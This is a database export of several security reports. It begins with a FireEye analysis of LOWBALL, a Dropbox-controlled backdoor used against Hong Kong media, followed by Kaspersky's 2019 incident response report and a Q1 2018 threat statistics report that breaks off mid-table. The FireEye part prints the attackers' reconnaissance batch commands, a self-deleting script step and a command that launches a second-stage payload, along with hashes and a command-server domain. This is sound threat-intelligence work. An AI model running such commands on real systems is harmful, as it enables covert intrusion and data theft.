Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/hongkongdropbox/hongkongdropboxfig1.jpg)\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nb9208a5b0504cb2283b1144fc455eaaa\n\n| \n\n\u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc \n \nec19ed7cddf92984906325da59f75351\n\n| \n\n\u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc \n \n6495b384748188188d09e9d5a0c401a4\n\n| \n\n(\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc \n \nIn all three cases, the payload was the same:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\ntime.exe \n \nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage \nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\nWmiApCom \n \n79b68cdd0044edd4fbf8067b22878644\n\n| \n\nWmiApCom.bat \n \nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\nMD5\n\n| \n\n| \n \n---|---|--- \n \n0beb957923df2c885d29a9c1743dd94b\n\n| \n\naccounts.serveftp.com\n\n| \n\n59.188.0.197 \n \nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC\n\nThe threat actor will then download the results and then delete the files from the cloud storage account.\n\n# Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "cvss3": {}, "published": "2015-12-01T08:00:00", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T08:00:00", "id": "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/08094429/fintech_abstract-990x400.jpg)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/04/16152111/pdf_icon_new.jpg) Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04-300x224.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05-300x203.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim's organization and we have no information on all of their findings \u2013 hence the 'Unknown reasons' on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that's not showing distrubution of 0- to 1-day vulnerabilities.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization's network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can't be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11-300x292.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.\n\nLet's weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&CK) where they are usually applied.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller & Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary's activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary's activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. \n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn't have a specialist in threat hunting or they are managed by an external SOC that doesn't have the full context for an event.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13-300x269.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14-300x292.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15-300x274.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16-293x300.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&CK tactics and techniques**\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17-757x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "cvss3": {}, "published": "2020-08-06T10:00:34", "type": "securelist", "title": "Incident Response Analyst Report 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "modified": "2020-08-06T10:00:34", "id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-15T21:13:49", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2014/08/08080813/quarter_threat.jpg)\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 